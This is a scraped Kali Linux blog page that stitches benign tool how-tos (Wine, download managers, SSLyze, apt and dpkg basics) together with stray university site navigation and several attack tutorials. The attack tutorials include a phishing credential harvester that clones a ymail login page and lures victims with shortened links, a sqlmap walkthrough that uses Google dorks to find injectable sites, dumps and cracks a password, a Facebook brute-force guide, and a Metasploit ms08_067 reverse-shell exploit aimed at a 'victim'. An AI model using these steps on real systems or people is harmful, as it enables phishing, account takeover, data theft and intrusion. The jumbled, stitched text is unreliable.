How to install Wine on Kali Linux and Debian 64 bit

To install wine. We'll first enable maltiarch, then update the system and finally install wine. The commands to accomplish that are as shown below.

sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install wine:i386
sudo apt-get install wine-bin:i386

It will download the packages and install them. After finishing the installation, check again to confirm that the wine have been installed successfully.Type

wine --version 

If you want an all in one command, here it is.

 sudo dpkg --add-architecture i386 && apt-get update && apt-get install wine-bin:i386

Hacking Facebook with Kali

Steps for setting up your system.

1. Download Kali Linux from here.
2. Extract the contents of Kali Linux iso file which you  downloaded in step and copy it to pendrive or instead of pendrive burn the iso file in cd if you want to make a cd of it.
3. After copying all contents to pendrive or burning the iso file in cd,reboot you system,press F8 on boot-time and select boot from pendrive if you have copied all the files in pendrive,else boot from cd-rom if you burn the iso file in cd.
4. After selecting the boot from device,the kali installation window will open,install accordingly as per your requirement.
5. NOTE:During installation,in mount point of selected installation drive,set mount point to "/".
6. Remember the username and password while installation as this will be necessity for this hacking method.
7. Once,installation is completed,system will reboot,login your account.
8. Your system is ready for use.

Method which we are using to hack the username and password or any user details isSocial Engineering Toolkit method.

Now lets set it up.

• Open terminal using ctrl+alt+t or click on the small black window image on the top left of your screen.
• Once terminal is open,type the code carefully.

sudo root

 Then enter your root username and password.Don't close the terminal.

• Next step is to open social engineering toolkit.For this type the below command in terminal.

se-toolkit

 You will see something in terminal of your system as shown below in the image.

  

• As shown above in image,you too will see the menu in your terminal.Press "1" and hit enter as we are going to do Social-Engineering Attacks.You will see something in terminal as shown below in the image.

• Once again,you will get a menu as shown above in the image.We are going to select Website Attack Vectors,so press "2" and hit enter.You will see something as shown in the image below.

• In this method,we are going to get the credential of the victim,so press "3" and hit enter as it will select credential harvester attack method.This will open  new menu as shown below in the image.

• Since,we want the username and password which is credential of victim,so we need to trap the victim in a look a like page to original website page(like phishing page) and for that we need to clone a website.To do this,press "2" and hit enter which will open something like shown below.
  

In above image,you might have noticed a red colour rectangle box made by me,in that box,you will find "tabnabbing:XXX.XX.XXX.X" where this "XXX.XX.XXX.X" is you computer IP address.To find IP address of your computer,open a new terminal and type the command given below.

su root
enter_your_root_password
 ifconfig

In above command,we first gain the root access,and then afterwards type "ifconfig"  and hit enter to get the IP address.
Copy paste this IP address at the end of "Tabnabbing:".I have used my IP address but for security reasons i can't reveal it,so i have posted here "XXX.XX.XXX.X".Please note that,if you don't put your computer IP address,they this method won't.After entering your IP address,hit enter.It will ask your to enter the url of website you want to clone as shown below.Here,i had entered "www.ymail.com" as i want to hack someone ymail account.The below image represents all the steps.

It will give a message that its working on cloning the site and will take a little bit time.

Once the process is completed,you will see something as shown in the image below.

• The next step is the most important step,till now we have make your IP address go online and anyone who visit your IP address will see the page which will look like the website of whose url you entered to clone.In this step,you need to shortened your IP address by using services like ADF.LY, Binbox, Goo.gl,etc.Once you enter your ip address on these sites to shorten,they will provide you a link,all you need to do is just send this shortened link to your victim.
• When the victim visit the url which you have sent them,the will see a same page of which                   url you had entered to clone the website.The victim will think that it is a original page and when the victim enters any of their information,you will see that information in the terminal.
• In this example,i have used ymail.com.Therefore,the victim will see homepage of yahoo mail.This is only the login form,i have entered the login username as:"Kali used to hack email-id and password" and password as: "Hacking successfull".

NOTE:Victim can identify that the page is a trap as the address bar of browser will be having your IP address.For best results,send the shortened url to victim mobile and ask them to visit urgently,or you can say visit this link and login to get latest updates of their favourite contents,etc.

RESULT.

The username and password will be shown in terminal window and will be similar to the image shown below.

Kali Sana 2.0! Internet Download Manager, Aria2, Uget!

Hey guys in this post i'm gonna show you all how to install a awesome download manager in kali sana 2.0 ! So, first of all open the teminal and enter the following command as show in the screenshot below

This command will basically install aria2 ... the command line download manager available for all linux distros. Bascially it's the dependency of our GUI software ... You can use aria2 from command line by just entering the command aria2c http://example.com/download/123.mp3 ... but in this post i'm gonna introduce you with this awesome open source gui software... that is Uget download manager ... it's easy as fuck to install uget download manager just enter the following command in the terminal, shown in the screenshot below.

so now aria2 and uget both are installed in your kali sana 2.0 .

and that's how uget download manager looks in kali sana 2.0.

• Home
• About us
• Faculties
• Programmes
• Research
• e-Library
• News Letters
• Contact Us

Main Menu

• Admissions
• Mailing
• Examination
• Live Media
• Downloads
• Alumni
• Life at AIOU
• Help Desk

Results Detail for Semester Spring 2015 Program:  Select C.T / P.T.C / ATTC Program Post Graduate Programs B.Ed Programs Matric Programs F.A Programs

Contact Us Allama Iqbal Open University Sector H-8,Islamabad Helpline: (051)111-112-468 Email : support@aiou.edu.pk	Welcome to Allama Iqbal Open University, The First Distance Education University in South Asia that caters to the Educational needs of 1.3 million students to enable them to study at their own place,at their own pace and at their own convenience.
Active Users:
©2016-2017

Hacking Website With SQLMAP in Kali Linux

What is SQLMAP

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

1. Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
2. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
3. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
4. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
5. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
6. Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry.
7. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
8. Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
9. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
10. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
11. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

[Source: www.sqlmap.org]Be considerate to the user who spends time and effort to put up a website and possibly depends on it to make his days end. Your actions might impact someone is a way you never wished for. I think I can’t make it anymore clearer.

Step 1: Find a Vulnerable Website

This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results.

Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website

This list a really long.. Took me a long time to collect them. If you know SQL, then you can add more here.. Put them in comment section and I will add them here.

Google Dork string Column 1	Google Dork string Column 2	Google Dork string Column 3
inurl:item_id=	inurl:review.php?id=	inurl:hosting_info.php?id=
inurl:newsid=	inurl:iniziativa.php?in=	inurl:gallery.php?id=
inurl:trainers.php?id=	inurl:curriculum.php?id=	inurl:rub.php?idr=
inurl:news-full.php?id=	inurl:labels.php?id=	inurl:view_faq.php?id=
inurl:news_display.php?getid=	inurl:story.php?id=	inurl:artikelinfo.php?id=
inurl:index2.php?option=	inurl:look.php?ID=	inurl:detail.php?ID=
inurl:readnews.php?id=	inurl:newsone.php?id=	inurl:index.php?=
inurl:top10.php?cat=	inurl:aboutbook.php?id=	inurl:profile_view.php?id=
inurl:newsone.php?id=	inurl:material.php?id=	inurl:category.php?id=
inurl:event.php?id=	inurl:opinions.php?id=	inurl:publications.php?id=
inurl:product-item.php?id=	inurl:announce.php?id=	inurl:fellows.php?id=
inurl:sql.php?id=	inurl:rub.php?idr=	inurl:downloads_info.php?id=
inurl:index.php?catid=	inurl:galeri_info.php?l=	inurl:prod_info.php?id=
inurl:news.php?catid=	inurl:tekst.php?idt=	inurl:shop.php?do=part&id=
inurl:index.php?id=	inurl:newscat.php?id=	inurl:productinfo.php?id=
inurl:news.php?id=	inurl:newsticker_info.php?idn=	inurl:collectionitem.php?id=
inurl:index.php?id=	inurl:rubrika.php?idr=	inurl:band_info.php?id=
inurl:trainers.php?id=	inurl:rubp.php?idr=	inurl:product.php?id=
inurl:buy.php?category=	inurl:offer.php?idf=	inurl:releases.php?id=
inurl:article.php?ID=	inurl:art.php?idm=	inurl:ray.php?id=
inurl:play_old.php?id=	inurl:title.php?id=	inurl:produit.php?id=
inurl:declaration_more.php?decl_id=	inurl:news_view.php?id=	inurl:pop.php?id=
inurl:pageid=	inurl:select_biblio.php?id=	inurl:shopping.php?id=
inurl:games.php?id=	inurl:humor.php?id=	inurl:productdetail.php?id=
inurl:page.php?file=	inurl:aboutbook.php?id=	inurl:post.php?id=
inurl:newsDetail.php?id=	inurl:ogl_inet.php?ogl_id=	inurl:viewshowdetail.php?id=
inurl:gallery.php?id=	inurl:fiche_spectacle.php?id=	inurl:clubpage.php?id=
inurl:article.php?id=	inurl:communique_detail.php?id=	inurl:memberInfo.php?id=
inurl:show.php?id=	inurl:sem.php3?id=	inurl:section.php?id=
inurl:staff_id=	inurl:kategorie.php4?id=	inurl:theme.php?id=
inurl:newsitem.php?num=	inurl:news.php?id=	inurl:page.php?id=
inurl:readnews.php?id=	inurl:index.php?id=	inurl:shredder-categories.php?id=
inurl:top10.php?cat=	inurl:faq2.php?id=	inurl:tradeCategory.php?id=
inurl:historialeer.php?num=	inurl:show_an.php?id=	inurl:product_ranges_view.php?ID=
inurl:reagir.php?num=	inurl:preview.php?id=	inurl:shop_category.php?id=
inurl:Stray-Questions-View.php?num=	inurl:loadpsb.php?id=	inurl:transcript.php?id=
inurl:forum_bds.php?num=	inurl:opinions.php?id=	inurl:channel_id=
inurl:game.php?id=	inurl:spr.php?id=	inurl:aboutbook.php?id=
inurl:view_product.php?id=	inurl:pages.php?id=	inurl:preview.php?id=
inurl:newsone.php?id=	inurl:announce.php?id=	inurl:loadpsb.php?id=
inurl:sw_comment.php?id=	inurl:clanek.php4?id=	inurl:pages.php?id=
inurl:news.php?id=	inurl:participant.php?id=
inurl:avd_start.php?avd=	inurl:download.php?id=
inurl:event.php?id=	inurl:main.php?id=
inurl:product-item.php?id=	inurl:review.php?id=
inurl:sql.php?id=	inurl:chappies.php?id=
inurl:material.php?id=	inurl:read.php?id=
inurl:clanek.php4?id=	inurl:prod_detail.php?id=
inurl:announce.php?id=	inurl:viewphoto.php?id=
inurl:chappies.php?id=	inurl:article.php?id=
inurl:read.php?id=	inurl:person.php?id=
inurl:viewapp.php?id=	inurl:productinfo.php?id=
inurl:viewphoto.php?id=	inurl:showimg.php?id=
inurl:rub.php?idr=	inurl:view.php?id=
inurl:galeri_info.php?l=	inurl:website.php?id=

Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection

For every string show above, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive.
Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

Just add a single quotation mark ' at the end of the URL. (Just to ensure, " is a double quotation mark and ' is a single quotation mark).
So now your URL will become like this:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'

If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page.
See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons.

Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server

Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’.
Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’.

MySQL Errors

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12


Oracle Errors

java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors

Query failed: ERROR: unterminated quoted string at or near “‘’’”

Step 2: List DBMS databases using SQLMAP SQL Injection

As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable.
Run the following command on your vulnerable website with.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs

In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15”)
--dbs = Enumerate DBMS databases
See screenshot below.

This commands reveals quite a few interesting info:

web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'

So, we now have two database that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection

Now we need to know how many tables this sqldummywebsite database got and what are their names. To find out that information, use the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables

Sweet, this database got 8 tables.

[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info

and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table probably contains username and passwords.

Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns on target table user_info of sqldummywebsite database using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from target table user_info of sqldummywebsite database.

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for … target table user_login and user_password .

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

SQLMAP SQL Injection makes is Easy! Just run the following command again:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what, we now have the username from the database:

[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Almost there, we now only need the password to for this user.. Next shows just that..

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user.

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

TADA!! We have password.

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their website vulnerable like that just can’t have a password like that.
That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it.
I have covered how to decrypt password extensively on this Cracking MD5, phpBB, MySQL and SHA1 passwords with Hashcat on Kali Linux post. If you’ve missed it, you’re missing out a lot.
I will cover it in short here but you should really learn how to use hashcat.

Step 7: Cracking password

So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that?

Step 7.a: Identify Hash type

Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value:

hash-identifier

Excellent. So this is DES(Unix) hash.

Step 7.b: Crack HASH using cudahashcat

First of all I need to know which code to use for DES hashes. So let’s check that:

cudahashcat --help | grep DES

So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500.
I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around.
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). Howeverm both cudaHashcat and oclHashcat found and cracked the key.
Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.

how to install themes for kali linux

How to Change GRUB Splash Image

Installing XDM (alternate of IDM) in Kali

Install XDM by Direct Download

For Those Who Used 32 Bit:

open Terninal and type:

 

wget http://sourceforge.net/projects/xdman/files/xdm-jre-32bit.tar.xz
tar -xvf xdm-jre-32bit.tar.xz

For Those Who Used 64 Bit:

open Terminal and type:

 

wget http://sourceforge.net/projects/xdman/files/xdm-jre-64bit.tar.xz
tar -xvf xdm-jre-64bit.tar.xz

Once Extracted go the xdm directory then run execute xdm file. Run through following command :

cd xdm
./xdm

Also can double click at xdm file to launch Xtreme Download Manager 2015

 

Fast and Full Featured SSL Scanner: SSLyze

 SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify mis-configurations affecting their SSL servers.  SSLyze is all Python code but it uses an OpenSSL wrapper written in C called nassl, which was specifically developed for allowing SSLyze to access the low-level OpenSSL APIs needed to perform deep SSL testing.

Features:

• Multi-processed and multi-threaded scanning: it’s very fast.
• Support for all SSL protocols, from SSL 2.0 to TLS 1.2.
• NEW: SSLyze can also be used as a library, in order to run scans and process the results directly from Python.
• Performance testing: session resumption and TLS tickets support.
• Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more.
• Server certificate validation and revocation checking through OCSP stapling.
• Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP, PostGres and FTP.
• Support for client certificates when scanning servers that perform mutual authentication.
• And much more !

Getting Started

SSLyze can be installed directly via pip:

pip install sslyze

It is also easy to directly clone the repository and the fetch the requirements:

git clone https://github.com/nabla-c0d3/sslyze.git
cd sslyze
pip install -r requirements.txt --target ./lib

Then, the command line tool can be used to scan servers:

python sslyze_cli.py --regular www.yahoo.com:443 www.google.com

SSLyze has been tested on the following platforms: Windows 7 (32 and 64 bits), Debian 7 (32 and 64 bits), OS X El Capitan.

Usage as a library

Starting with version 0.13.0, SSLyze can be used as a Python module in order to run scans and process the results directly in Python:

# Script to get the list of SSLv3 cipher suites supported by smtp.gmail.com
hostname = 'smtp.gmail.com'
try:
    # First we must ensure that the server is reachable
    server_info = ServerConnectivityInfo(hostname=hostname, port=587,
                                         tls_wrapped_protocol=TlsWrappedProtocolEnum.STARTTLS_SMTP)
    server_info.test_connectivity_to_server()
except ServerConnectivityError as e:
    raise RuntimeError('Error when connecting to {}: {}'.format(hostname, e.error_msg))

# Get the list of available plugins
sslyze_plugins = PluginsFinder()

# Create a process pool to run scanning commands concurrently
plugins_process_pool = PluginsProcessPool(sslyze_plugins)

# Queue a scan command to get the server's certificate
plugins_process_pool.queue_plugin_task(server_info, 'sslv3')

# Process the result and print the certificate CN
for server_info, plugin_command, plugin_result in plugins_process_pool.get_results():
    if plugin_result.plugin_command == 'sslv3':
        # Do something with the result
        print 'SSLV3 cipher suites'
        for cipher in plugin_result.accepted_cipher_list:
            print '    {}'.format(cipher.name)

The scan commands are same as the ones described in the sslyze_cly.py --help text.

They will all be run concurrently using Python’s multiprocessing module. Each command will return a PluginResult object with attributes that contain the result of the scan command run on the server (such as list of supported cipher suites for the --tlsv1 command). These attributes are specific to each plugin and command but are all documented (within each plugin’s module).

                                               SOURCE AND DOWNLIOAD                                    

How to Create a Deep Web Site

Hoe to install Kali Linux 2

Hack Facebook Account Password Using Brute Force Attack

The method I am going to use here will be brute forcing, Using World’s Best Passwords Dictionary, CrackStation.

So, First lets know something about Brute force attacks, “A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). 

In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.” 

But, In our case I’ll be using a Python script and a Long Dictionary Of passwords. I have personally tried it on myself and it really works . 

Requirement

• A Kali Machine / Or Any Python Engine Will work! 
• Facebook.py ( v1 or v2 ) 
• A FaceBook id Of course 
• CrackStation Word List! (Download Here) 

Now, Lets Start The Work

step 1. Install Python-mechanize using command mention below 

[*] root@root:~#apt-get install python-mechanize 

step 2. Add facebook.py using the command below 

[*] root@root~# chmod +x facebook.py [*] root@root:~# python facebook.py 

step 3. Now enter |Email| or |Phone number| or |Profile ID number| or |Username| of the victim,                                                              

step 4 . Now Give The "Path" Of Your CrackStation Word list 

step 5. Now it will try all passwords present in the word list, So relax and have a cup of coffee because it will take time depending on speed of your processor and password strength of your victim!  

Kali Basics

How to change the root password
root@bt:~# passwd Enter new UNIX password: {enter
your new password here}
Retype new UNIX password: {enter your new password
again}
passwd: password updated successfully
root@bt:~#
How to start services
root@bt:~# /etc/init.d/openvpn start
Starting Virtual private network daemon(s)…
root@bt:~# /etc/init.d/openvpn stop

---

How to check kernel version
Use the uname -a as show below

---

Common Apt Commands
apt-get install <package> Downloads <package> and
all of its dependencies, and installs or upgrades them.
apt-get remove [–purge] <package> Removes
<package> and any packages that depend on it. –purge
specifies that packages should be purged.
apt-get update Updates packages listings from the
repo, should be run at least once a week.
apt-get upgrade Upgrades all currently installed
packages with those updates available from the repo.
should be run once a week.
apt-get dist-upgrade [-u] Similar to apt-get upgrade,
except that dist-upgrade will install or remove
packages to satisfy dependencies.
apt-cache search <pattern> Searches packages and
descriptions for <pattern>.
apt-cache show <package> Shows the full description
of <package>.
apt-cache showpkg <package> Shows a lot more detail
about <package>, and its relationships to other
packages.
man apt Will give you more info on these commands
as well as many that are in less common usage.

---

Common dpkg commands
dpkg -i <package.deb> Installs a package file; one that
you downloaded manually, for example.
dpkg -c <package.deb> Lists the contents of
<package.deb> a .deb file.
dpkg -I <package.deb> Extracts package information
from <package.deb> a .deb file.
dpkg -r <package> Removes an installed package
named <package>
dpkg -P <package> Purges an installed package named
<package>. The difference between remove and purge
is that while remove only deletes data and executables,
purge also deletes all configuration files in addition.
dpkg -L <package> Gives a listing of all the files
installed by <package>. See also dpkg -c for checking the contents of a .deb file.
dpkg -s <package> Shows information on the installed
package <package>. See also apt-cache show for
viewing package information in the Debian archive
and dpkg -I for viewing package information extracted
from a .deb file.
dpkg-reconfigure <package> Reconfigures an
installed package
man dpkg Will give you more info on these commands
as well as many that are in less common usage.

Remote PC Hacking via Kali Linux

Remote PC Hacking via Kali Linux using Metasploit

Open a terminal and type:
 msfconsole

Here are the commands you need to type in:
use windows/smb/ms08_067_netapi
 set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST *Your ip adress* (If you don't know your ip adress then open a new terminal and type:
ifconfig

your ip adress will be somewhere in the output.( exp:inet addr:192.168.101.100

set LPORT 4444

set RHOST *victim's ip*

set RPORT 445

exploit

(Now You should connect)

---